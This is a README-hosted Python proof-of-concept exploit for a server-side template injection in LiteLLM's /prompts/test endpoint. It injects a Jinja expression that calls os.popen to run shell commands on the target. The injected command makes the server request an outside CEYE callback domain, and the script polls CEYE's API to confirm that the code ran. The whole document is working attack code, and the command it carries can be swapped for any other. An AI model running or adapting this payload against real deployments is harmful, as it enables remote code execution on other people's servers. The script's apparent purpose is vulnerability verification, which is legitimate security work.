README.md
Rendering markdown...
#!/usr/bin/env python3
"""
Minimal LiteLLM CVE-2026-42203 /prompts/test SSTI PoC.
Proof strategy:
Execute Python code that requests: http://{random}.{your-ceye-domain}/
Then query CEYE request records with filter={random}. If CEYE received the
callback, the SSTI command execution path is confirmed.
CEYE domain/token and the LiteLLM API key are intentionally not hardcoded.
Pass them with CLI flags or environment variables when running in your lab.
"""
from __future__ import annotations
import argparse
import json
import os
import secrets
import string
import sys
import threading
import time
from typing import Any, Dict, Optional
import requests
DEFAULT_TARGET = "http://127.0.0.1:4000"
DEFAULT_MODEL = "gpt-3.5-turbo"
DEFAULT_API_KEY_ENV = "LITELLM_API_KEY"
DEFAULT_CEYE_DOMAIN_ENV = "CEYE_DOMAIN"
DEFAULT_CEYE_TOKEN_ENV = "CEYE_TOKEN"
DEFAULT_CEYE_TYPE = "request"
DEFAULT_TIMEOUT = 10.0
DEFAULT_WAIT = 20.0
DEFAULT_INTERVAL = 3.0
EXIT_VULNERABLE = 0
EXIT_NOT_VULNERABLE = 1
EXIT_CONFIG_ERROR = 2
EXIT_INCONCLUSIVE = 3
def random_filter(length: int = 12) -> str:
alphabet = string.ascii_lowercase + string.digits
return "".join(secrets.choice(alphabet) for _ in range(length))
def quote_for_jinja_single_string(value: str) -> str:
return value.replace("\\", "\\\\").replace("'", "\\'").replace("\n", "\\n")
def build_payload(model: str, command: str) -> Dict[str, Any]:
command = quote_for_jinja_single_string(command)
ssti = "{{ cycler.__init__.__globals__.os.popen('" + command + "').read() }}"
return {
"dotprompt_content": f"""---
model: {model}
temperature: 0
---
User: {ssti}
""",
"prompt_variables": {},
}
def build_python_http_command(url: str) -> str:
return (
"python3 -c "
f"\"import urllib.request; urllib.request.urlopen('{url}', timeout=5).read()\""
)
def trigger_payload(
target: str,
api_key: str,
body: Dict[str, Any],
timeout: float,
verify_tls: bool,
) -> None:
endpoint = target.rstrip("/") + "/prompts/test"
try:
requests.post(
endpoint,
headers={
"Authorization": f"Bearer {api_key}",
"Content-Type": "application/json",
},
json=body,
timeout=timeout,
verify=verify_tls,
)
except requests.RequestException as exc:
print(f"[!] Background trigger request error: {exc}")
def start_trigger_payload(
target: str,
api_key: str,
body: Dict[str, Any],
timeout: float,
verify_tls: bool,
) -> None:
endpoint = target.rstrip("/") + "/prompts/test"
thread = threading.Thread(
target=trigger_payload,
kwargs={
"target": target,
"api_key": api_key,
"body": body,
"timeout": timeout,
"verify_tls": verify_tls,
},
daemon=True,
)
thread.start()
print(f"[*] Sending payload to: POST {endpoint}")
def query_ceye(
token: str,
record_type: str,
filter_value: str,
timeout: float,
) -> Dict[str, Any]:
response = requests.get(
"http://api.ceye.io/v1/records",
params={
"token": token,
"type": record_type,
"filter": filter_value,
},
timeout=timeout,
)
response.raise_for_status()
return response.json()
def ceye_has_callback(data: Dict[str, Any], filter_value: str) -> bool:
return filter_value in json.dumps(data, ensure_ascii=False)
def poll_ceye(
token: str,
record_type: str,
filter_value: str,
wait: float,
interval: float,
timeout: float,
) -> bool:
deadline = time.time() + wait
last_error: Optional[str] = None
while time.time() <= deadline:
try:
data = query_ceye(token, record_type, filter_value, timeout)
if ceye_has_callback(data, filter_value):
print(f"[+] CEYE matched filter: {filter_value}")
print(json.dumps(data, ensure_ascii=False, indent=2))
return True
except (requests.RequestException, ValueError) as exc:
last_error = str(exc)
time.sleep(interval)
if last_error:
print(f"[!] Last CEYE query error: {last_error}")
return False
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="Minimal LiteLLM /prompts/test SSTI PoC with CEYE request callback."
)
parser.add_argument("-t", "--target", default=DEFAULT_TARGET, help=f"LiteLLM base URL, default: {DEFAULT_TARGET}")
parser.add_argument(
"--auth",
"--api-key",
dest="api_key",
default=os.getenv(DEFAULT_API_KEY_ENV, ""),
help=f"LiteLLM key allowed to call /prompts/test. Can also be set with {DEFAULT_API_KEY_ENV}.",
)
parser.add_argument("--model", default=DEFAULT_MODEL, help=f"dotprompt model value, default: {DEFAULT_MODEL}")
parser.add_argument(
"--ceye-token",
default=os.getenv(DEFAULT_CEYE_TOKEN_ENV, ""),
help=f"CEYE API token. Can also be set with {DEFAULT_CEYE_TOKEN_ENV}.",
)
parser.add_argument(
"--ceye-domain",
default=os.getenv(DEFAULT_CEYE_DOMAIN_ENV, ""),
help=f"CEYE domain. Can also be set with {DEFAULT_CEYE_DOMAIN_ENV}.",
)
parser.add_argument("--ceye-type", default=DEFAULT_CEYE_TYPE, help=f"CEYE record type, default: {DEFAULT_CEYE_TYPE}")
parser.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT, help=f"HTTP timeout, default: {DEFAULT_TIMEOUT}s")
parser.add_argument("--wait", type=float, default=DEFAULT_WAIT, help=f"Seconds to wait for CEYE callback, default: {DEFAULT_WAIT}s")
parser.add_argument("--interval", type=float, default=DEFAULT_INTERVAL, help=f"CEYE polling interval, default: {DEFAULT_INTERVAL}s")
parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification for target request")
return parser.parse_args()
def validate_args(args: argparse.Namespace) -> Optional[str]:
if not args.target.strip():
return "--target must not be empty"
if not args.api_key.strip():
return "--auth/--api-key must not be empty"
if not args.ceye_token.strip():
return "--ceye-token must not be empty"
if not args.ceye_domain.strip():
return "--ceye-domain must not be empty"
if args.timeout <= 0:
return "--timeout must be greater than 0"
if args.wait <= 0:
return "--wait must be greater than 0"
if args.interval <= 0:
return "--interval must be greater than 0"
return None
def main() -> int:
args = parse_args()
validation_error = validate_args(args)
if validation_error:
print(f"[CONFIG_ERROR] {validation_error}", file=sys.stderr)
return EXIT_CONFIG_ERROR
filter_value = random_filter()
callback_url = f"http://{filter_value}.{args.ceye_domain}/"
command = build_python_http_command(callback_url)
body = build_payload(args.model, command)
print(f"[*] Python payload: {command}")
print(
"[*] CEYE query: "
f"http://api.ceye.io/v1/records?token={args.ceye_token}&type={args.ceye_type}&filter={filter_value}"
)
start_trigger_payload(
target=args.target,
api_key=args.api_key,
body=body,
timeout=args.timeout,
verify_tls=not args.insecure,
)
if poll_ceye(
token=args.ceye_token,
record_type=args.ceye_type,
filter_value=filter_value,
wait=args.wait,
interval=args.interval,
timeout=args.timeout,
):
print("[VULNERABLE] CEYE received the callback request.")
return EXIT_VULNERABLE
print("[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.")
return EXIT_NOT_VULNERABLE
if __name__ == "__main__":
raise SystemExit(main())